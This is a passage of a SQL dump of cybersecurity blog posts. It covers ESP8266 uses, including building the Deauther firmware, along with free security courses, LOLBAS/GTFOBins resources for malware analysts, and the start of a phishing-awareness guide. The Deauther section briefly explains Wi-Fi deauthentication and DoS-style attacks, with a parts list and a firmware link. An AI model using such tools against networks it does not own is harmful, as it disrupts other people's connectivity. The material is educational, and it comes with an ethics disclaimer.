class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By analyzing network traffic and comparing it against known threat patterns, the ESP8266 can act as an early warning system. 
While it’s not as powerful as dedicated hardware, it’s a cost-effective tool for basic monitoring.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Honeytrap for Threat Intelligence</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 can be set up as a simple \"honeypot,\" a decoy system designed to lure attackers. Posing as a vulnerable device on the network, it:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Collects information about the methods attackers use.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Provides insights into potential threats that can inform future defenses.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This lightweight honeypot approach makes it an excellent learning tool for cybersecurity researchers and those wanting to test network vulnerabilities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Note:</strong></b> While these ideas utilize the ESP8266 effectively, they should not replace dedicated tools and systems. 
Think of the ESP8266 as a supplementary option in your security toolkit.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-World Application in Cybersecurity: The ESP8266 Deauther Project</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the most fascinating uses of the ESP8266 in cybersecurity is the <b><strong class=\"font-bold\">ESP8266 Deauther Project</strong></b>. This open-source firmware leverages the chip’s Wi-Fi capabilities to test network vulnerabilities ethically.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Features of the ESP8266 Deauther</h4>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Wi-Fi Scanning</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 can scan for nearby Wi-Fi networks and connected devices, providing insights into the local wireless landscape.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Deauthentication Attacks</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The software can exploit a known Wi-Fi vulnerability by sending deauthentication packets, which force devices to disconnect from the network. 
This functionality can be used ethically to identify vulnerable devices.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Denial-of-Service (DoS) Simulation</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By flooding the network with fake traffic or deauthentication packets, the ESP8266 can mimic a real-world DoS attack, helping organizations test their network’s robustness against such disruptions.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Building an ESP8266 Deauther</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To create your own ESP8266 Deauther, you’ll need the following:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hardware</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">SSD1306 OLED Display</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Three tactile push buttons</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Wemos D1 Mini board (ESP8266-based)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 
[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Software</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">You can download the required firmware from <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://github.com/SpacehuhnTech/esp8266_deauther\">Spacehuhn Tech’s GitHub repository</a>. Simply upload the firmware to your Wemos D1 Mini using the Arduino IDE, and you’re ready to explore its features responsibly.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Disclaimer</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 Deauther is strictly for ethical testing and educational purposes. Use it only on your own networks unless explicitly permitted by the network owner. Ensure compliance with local laws and regulations to avoid misuse.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Challenges and Considerations</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While the ESP8266 offers exciting possibilities for IoT and cybersecurity, it’s important to note its limitations:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Limited Processing Power</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Complex security analysis may exceed the chip’s capabilities, making it best suited for basic 
tasks or as part of a larger system.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Security Concerns</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 itself must be secured to prevent unauthorized access. Use strong passwords, update the firmware regularly, and avoid connecting it to untrusted networks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Despite its limitations, the ESP8266 remains a valuable tool for learning, experimenting, and building cost-effective solutions.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of ESP8266 in Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266’s affordability and functionality have opened doors to innovative applications in cybersecurity. 
Whether used for network monitoring, ethical hacking, or IoT device testing, this tiny chip proves that impactful tools don’t always require a big budget.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By leveraging the ESP8266 responsibly, businesses and individuals alike can strengthen their understanding of Wi-Fi networks and identify potential vulnerabilities.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 exemplifies how a low-cost component can offer immense value not just in IoT but also in cybersecurity. From intrusion detection systems to honeypots and ethical hacking tools like the ESP8266 Deauther, its versatility is unmatched.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you ready to explore the potential of the ESP8266? Whether you’re building the next big IoT project or seeking to enhance network security knowledge, this tiny chip is the perfect starting point. Happy tinkering!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:39:20', '2026-01-12 21:41:44', 'Information Security', 'ESP8266: A Tiny WiFi Chip Powering Big IoT and Cybersecurity Innovations', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(130, 'Free Cybersecurity Courses: Save Thousands and Boost Your Career!', 'free-cybersecurity-courses-save-thousands-and-boost-your-career', 'Presenting a list of <strong>FREE cybersecurity courses</strong> just for you! 💻 Seize this incredible opportunity to save thousands of dollars while gaining valuable skills. Bookmark this page and dive into my curated curriculum to get ahead in your cybersecurity career.\r\n<h3>Why Learn Cybersecurity?</h3>\r\nCybersecurity is an ever-evolving field with immense opportunities. Whether you\'re a beginner or looking to sharpen your skills, these free courses offer comprehensive learning experiences to help you stay ahead of the curve.\r\n<h3>What You\'ll Get</h3>\r\n<ul>\r\n 	<li><strong>29 free lessons</strong> to get you interview-ready and ahead of 90% of people.</li>\r\n 	<li><strong>Top-notch tutorials</strong> and certifications to turbocharge your skillset.</li>\r\n</ul>\r\n<h3>Beginner Courses</h3>\r\n🔐 <strong><a href=\"https://www.netacad.com/courses/cybersecurity/introduction-cybersecurity\" target=\"_new\" rel=\"noreferrer noopener\">Introduction to Cybersecurity</a></strong>\r\nA beginner-friendly course to understand the essentials of cybersecurity.\r\n\r\n🔐 <strong><a href=\"https://www.udacity.com/course/intro-to-cybersecurity-nanodegree--nd545\" target=\"_new\" rel=\"noreferrer noopener\">Intro to Information Security by Udacity</a></strong>\r\nA comprehensive introduction to the basics of information security.\r\n\r\n🔐 <strong><a href=\"https://www.netacad.com/courses/networking/networking-essentials\" target=\"_new\" rel=\"noreferrer noopener\">Networking Essentials</a></strong>\r\nFundamental networking skills critical for cybersecurity.\r\n\r\n🔐 <strong><a href=\"https://www.netacad.com/courses/cybersecurity/cybersecurity-essentials\" target=\"_new\" rel=\"noreferrer noopener\">Cybersecurity Essentials</a></strong>\r\nDive deeper into the key concepts and practices in cybersecurity.\r\n\r\n🔐 <strong><a 
href=\"https://training.fortinet.com/\" target=\"_new\" rel=\"noreferrer noopener\">NSE 1, 2 &amp; 3 by Fortinet</a></strong>\r\nGain certifications that cover basic to advanced network security.\r\n\r\n🔐 <strong><a href=\"https://codered.eccouncil.org/course/network-defense-essentials\" target=\"_new\" rel=\"noreferrer noopener\">Network Defense Essentials (NDE) by EC-Council</a></strong>\r\nLearn the basics of network defense.\r\n\r\n🔐 <strong><a href=\"https://codered.eccouncil.org/course/ethical-hacking-essentials?logged=false\" target=\"_new\" rel=\"noreferrer noopener\">Ethical Hacking Essentials (EHE) by EC-Council</a></strong>\r\nGet started with ethical hacking principles and techniques.\r\n\r\n🔐 <strong><a href=\"https://codered.eccouncil.org/course/digital-forensics-essentials?logged=false\" target=\"_new\" rel=\"noreferrer noopener\">Digital Forensics Essentials (DFE) by EC-Council</a></strong>\r\nLearn the fundamentals of digital forensics.\r\n\r\n🔐 <strong><a href=\"https://www.open.edu/openlearn/science-maths-technology/information-security?active-tab=description-tab\" target=\"_new\" rel=\"noreferrer noopener\">Information Security by OpenLearn</a></strong>\r\nExplore the broad aspects of information security through this course.\r\n\r\n🔐 <strong><a href=\"https://www.open.edu/openlearn/digital-computing/network-security?active-tab=description-tab\" target=\"_new\" rel=\"noreferrer noopener\">Network Security by OpenLearn</a></strong>\r\nLearn about protecting data and networks from threats.\r\n\r\n🔐 <strong><a href=\"https://www.open.edu/openlearn/money-business/risk-management?active-tab=description-tab\" target=\"_new\" rel=\"noreferrer noopener\">Risk Management by OpenLearn</a></strong>\r\nUnderstand how to identify and manage cybersecurity risks.\r\n\r\n🔐 <strong><a href=\"https://www.isc2.org/Certifications/CC\" target=\"_new\" rel=\"noreferrer noopener\">Certified in Cybersecurity℠ - CC by (ISC)²</a></strong>\r\nAchieve certification to 
validate your cybersecurity skills.\r\n<h3>Intermediate Courses</h3>\r\n🔐 <strong><a href=\"https://www.udacity.com/course/infrastructure-and-network-security-architecture-planning-and-design--cd0396\" target=\"_new\" rel=\"noreferrer noopener\">Network Security by Udacity</a></strong>\r\nLearn the fundamentals of network security, including architecture, planning, and design.\r\n\r\n🔐 <strong><a href=\"https://codered.eccouncil.org/course/android-bug-bounty-hunting-hunt-like-a-rat?logged=false\" target=\"_new\" rel=\"noreferrer noopener\">Android Bug Bounty Hunting: Hunt Like a Rat</a></strong>\r\nMaster techniques for finding vulnerabilities in Android applications.\r\n\r\n🔐 <strong><a href=\"https://portswigger.net/web-security\" target=\"_new\" rel=\"noreferrer noopener\">PortSwigger Web Hacking</a></strong>\r\nLearn web application security and penetration testing.\r\n\r\n🔐 <strong><a href=\"https://www.qualys.com/training/\" target=\"_new\" rel=\"noreferrer noopener\">Vulnerability Management by Qualys</a></strong>\r\nLearn about identifying and managing vulnerabilities.\r\n\r\n🔐 <strong><a href=\"https://www.classcentral.com/course/software-security-1728\" target=\"_new\" rel=\"noreferrer noopener\">Software Security by Class Central</a></strong>\r\nUnderstand the principles of building secure software.\r\n\r\n🔐 <strong><a href=\"https://training.linuxfoundation.org/training/developing-secure-software-lfd121/\" target=\"_new\" rel=\"noreferrer noopener\">Developing Secure Software by Linux Foundation</a></strong>\r\nAdvanced course on secure software development practices.\r\n\r\n🔐 <strong><a href=\"https://explore.skillbuilder.aws/learn/signin\" target=\"_new\" rel=\"noreferrer noopener\">AWS Cloud Certifications (Cybersecurity)</a></strong>\r\nCertification courses focused on AWS cloud security.\r\n\r\n🔐 <strong><a href=\"https://learn.microsoft.com/en-us/training/azure/\" target=\"_new\" rel=\"noreferrer noopener\">Microsoft Learn for 
Azure</a></strong>\r\nLearn to secure and manage Microsoft\'s cloud platform, Azure.\r\n\r\n🔐 <strong><a href=\"https://cloud.google.com/learn/training\" target=\"_new\" rel=\"noreferrer noopener\">Google Cloud Training</a></strong>\r\nDevelop skills in securing and managing Google Cloud services.\r\n\r\n🔐 <strong><a href=\"https://www.splunk.com/en_us/training/free-courses/overview.html\" target=\"_new\" rel=\"noreferrer noopener\">Splunk Free Courses</a></strong>\r\nCourses on using Splunk for security and operational intelligence.\r\n<h3>Advanced Courses</h3>\r\n🔐 <strong><a href=\"https://www.open.edu/openlearn/science-maths-technology/digital-forensics?active-tab=description-tab\" target=\"_new\" rel=\"noreferrer noopener\">Digital Forensics by OpenLearn</a></strong>\r\nStudy digital forensics and how to handle digital evidence.\r\n\r\n🔐 <strong><a href=\"https://codered.eccouncil.org/course/introduction-to-dark-web-anonymity-and-cryptocurrency?logged=false\" target=\"_new\" rel=\"noreferrer noopener\">Dark Web, Anonymity, and Cryptocurrency by EC-Council</a></strong>\r\nUnderstand the dark web and the role of anonymity and cryptocurrency.\r\n\r\n🔐 <strong><a href=\"https://taggartinstitute.org/p/responsible-red-teaming\" target=\"_new\" rel=\"noreferrer noopener\">RedTeaming by Taggart Institute</a></strong>\r\nGain skills in red teaming and adversary simulation.\r\n\r\n🔐 <strong><a href=\"https://digitaldefynd.com/best-network-security-courses/?redirccnasecurity/\" target=\"_new\" rel=\"noreferrer noopener\">CCNA Security Courses</a></strong>\r\nComprehensive training on network security, aligned with the CCNA certification.\r\n\r\n🔐 <strong><a href=\"https://training.linuxfoundation.org/training/developing-secure-software-lfd121/\" target=\"_new\" rel=\"noreferrer noopener\">Secure Software Development by Linux Foundation</a></strong>\r\nIn-depth look at practices for secure software development.\r\n\r\n🔐 <strong><a 
href=\"https://www.classcentral.com/course/software-security-1728\" target=\"_new\" rel=\"noreferrer noopener\">Maryland Software Security</a></strong>\r\nComprehensive course on software security principles.\r\n\r\n<hr />\r\n\r\nEager to start your cybersecurity journey? Dive into these courses now and elevate your career! Happy learning!', '', NULL, NULL, 1, 'draft', '2024-08-01 02:36:32', '2026-01-12 21:41:44', 'Information Security', 'Free Cybersecurity Courses: Save Thousands and Boost Your Career!', '', NULL),
(131, 'Three Powerful Projects to Enhance Your Malware Analysis Skills', 'three-powerful-projects-to-enhance-your-malware-analysis-skills', '<div class=\"feed-shared-update-v2__description-wrapper\">\r\n<div class=\"feed-shared-inline-show-more-text feed-shared-update-v2__description feed-shared-inline-show-more-text--minimal-padding feed-shared-inline-show-more-text--expanded \">\r\n<div class=\"update-components-text relative feed-shared-update-v2__commentary \" dir=\"ltr\">\r\n<h2 class=\"\" data-sourcepos=\"1:1-1:79\">Deep Dive: Three Projects to Supercharge Your Malware Analysis Skills <strong>✨</strong></h2>\r\n<p data-sourcepos=\"3:1-3:90\">Malware analysis is an intricate art in the cybersecurity world. It demands the ability to dissect malicious software, comprehend its inner workings, and develop effective defenses. This blog post dives deep into three exceptional projects that can significantly elevate your malware analysis expertise.</p>\r\n<p data-sourcepos=\"5:1-5:76\"><strong>Project 1: <a href=\"https://filesec.io\">FileSec.io</a> - Unmasking the Malicious Disguise of File Extensions</strong></p>\r\n<p data-sourcepos=\"7:1-7:67\">File extensions play a critical role in how our computers interpret files. However, attackers can exploit these extensions for malicious purposes like phishing scams, executing malicious code, and launching macro-based attacks. This is where FileSec steps in as your hero!</p>\r\n<p data-sourcepos=\"9:1-9:274\">FileSec is a comprehensive and meticulously curated list that details file extensions commonly misused for malicious activities. 
By understanding these extensions and their potential dangers, you gain a significant advantage in fortifying your defenses against such attacks.</p>\r\n<p data-sourcepos=\"11:1-11:31\"><strong>Here\'s what FileSec offers:</strong></p>\r\n\r\n<ul data-sourcepos=\"13:1-14:89\">\r\n 	<li data-sourcepos=\"13:1-13:108\"><strong>Extensive list:</strong> It catalogs a wide range of file extensions that can be abused for malicious purposes.</li>\r\n 	<li data-sourcepos=\"14:1-14:89\"><strong>Detailed explanations:</strong> It provides insights into how each extension can be misused, giving you a deeper understanding of the attacker\'s tactics.</li>\r\n 	<li data-sourcepos=\"15:1-16:0\"><strong>Improved detection capabilities:</strong> By recognizing these red flags, you can become more adept at identifying and blocking potentially malicious files.</li>\r\n</ul>\r\n<p data-sourcepos=\"19:1-19:87\"><strong>Project 2: Windows LOLBins - Unveiling the Stealthy \"Living Off the Land\" Attackers (https://lolbas-project.github.io/</strong><strong>)</strong></p>\r\n<p data-sourcepos=\"21:1-21:479\">LOLBins, an abbreviation for Living Off the Land Binaries, represent a cunning tactic employed by attackers. They leverage legitimate, pre-existing binaries (programs) already present on a system to achieve their malicious goals. This makes their activity appear more benign, potentially bypassing security measures. 
The Windows LOLBins project acts as a decoder ring, providing valuable insights into these legitimate binaries and how attackers can manipulate them for nefarious purposes.</p>\r\n<p data-sourcepos=\"23:1-23:49\"><strong>Why understanding Windows LOLBins is crucial:</strong></p>\r\n\r\n<ul data-sourcepos=\"25:1-28:0\">\r\n 	<li data-sourcepos=\"25:1-25:167\"><strong>Enhanced detection:</strong> By knowing how attackers can manipulate these binaries, you can better identify suspicious activity that might otherwise fly under the radar.</li>\r\n 	<li data-sourcepos=\"26:1-26:163\"><strong>Improved mitigation strategies:</strong> Understanding the functionalities abused by attackers allows you to develop more effective methods to mitigate these attacks.</li>\r\n 	<li data-sourcepos=\"27:1-28:0\"><strong>Staying ahead of the curve:</strong> Attackers are constantly evolving their tactics. Knowledge of LOLBins helps you anticipate and prepare for potential threats.</li>\r\n</ul>\r\n&nbsp;\r\n<p data-sourcepos=\"34:1-34:79\"><strong>Project 3: GTFOBins - Mastering the Dark Side of Legitimate Linux Functions</strong></p>\r\n<p data-sourcepos=\"36:1-36:18\">Similar to LOLBins, the GTFOBins project focuses on the realm of Linux. It delves into legitimate functions within various Unix binaries that attackers can exploit. 
These functions can be abused for a variety of malicious activities, including:</p>\r\n\r\n<ul data-sourcepos=\"38:1-41:0\">\r\n 	<li data-sourcepos=\"38:1-38:85\"><strong>Privilege Escalation:</strong> Gaining unauthorized administrative access on the system.</li>\r\n 	<li data-sourcepos=\"39:1-39:61\"><strong>File Transfer:</strong> Uploading or downloading sensitive data.</li>\r\n 	<li data-sourcepos=\"40:1-41:0\"><strong>Remote Access Shells:</strong> Establishing a connection to the system for further exploitation.</li>\r\n</ul>\r\n<p data-sourcepos=\"42:1-42:150\">By understanding how attackers can misuse these functionalities, you can become more adept at detecting and thwarting their attempts on Linux systems.</p>\r\n<p data-sourcepos=\"44:1-44:37\"><strong>Why GTFOBins is a valuable asset:</strong></p>\r\n\r\n<ul data-sourcepos=\"46:1-48:0\">\r\n 	<li data-sourcepos=\"46:1-46:169\"><strong>Proactive Defense:</strong> By learning about these vulnerabilities, you can implement measures to harden your Linux systems and make them less susceptible to exploitation.</li>\r\n 	<li data-sourcepos=\"47:1-48:0\"><strong>Improved Incident Response:</strong> If a Linux system is compromised, knowledge of GTFOBins can help you identify the specific functions attackers might have abused, leading to a faster and more effective response.</li>\r\n</ul>\r\n<p data-sourcepos=\"51:1-51:445\">These three projects offer a treasure trove of resources for anyone working in malware analysis. FileSec equips you with knowledge about malicious file extensions. Windows LOLBins and GTFOBins shed light on how attackers can manipulate legitimate programs for their advantage. 
By incorporating these resources into your malware analysis workflow, you can significantly enhance your ability to identify, understand, and combat malicious software.</p>\r\n\r\n</div>\r\n</div>\r\n</div>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:35:10', '2026-01-12 21:41:44', 'Information Security', 'Three Powerful Projects to Enhance Your Malware Analysis Skills', '', NULL),
(132, 'How to Recognize and Avoid Phishing Emails to Stay Secure', 'how-to-recognize-and-avoid-phishing-emails-to-stay-secure', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing attacks are one of the most common tactics cybercriminals use to access sensitive information, such as login credentials, credit card numbers, and personal data. Falling victim to one of these scams can result in financial loss, identity theft, or security breaches. This blog will guide you through understanding phishing emails and provide actionable tips on how to detect and avoid them.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Identifying Phishing Emails is Crucial</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails are designed to look like legitimate correspondence from trusted institutions, such as banks, government agencies, or reputable companies. This deceptive appearance makes them hard to spot. 
If a recipient provides sensitive information, attackers can:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Steal money directly from bank accounts,</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use personal information to open credit lines,</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Access personal accounts such as emails, e-commerce platforms, or work systems.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding how to identify phishing attempts is a key step in protecting your personal and professional security.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Ways to Recognize a Phishing Email</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Check for a Suspicious Sender</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails often use fake email addresses that closely resemble legitimate ones. 
However, slight variations can give them away.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Example</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Fake email address: `support@go0gle.com`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Legitimate email address: `support@google.com`</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to Spot It</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Hover over the sender\'s name to reveal the full email address.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Compare the sender\'s email to the official address of the company.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tools to Investigate Senders</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hunter.io</strong></b> or <b><strong class=\"font-bold\">Maltego</strong></b> can verify if the email address is authentic or linked to phishing 
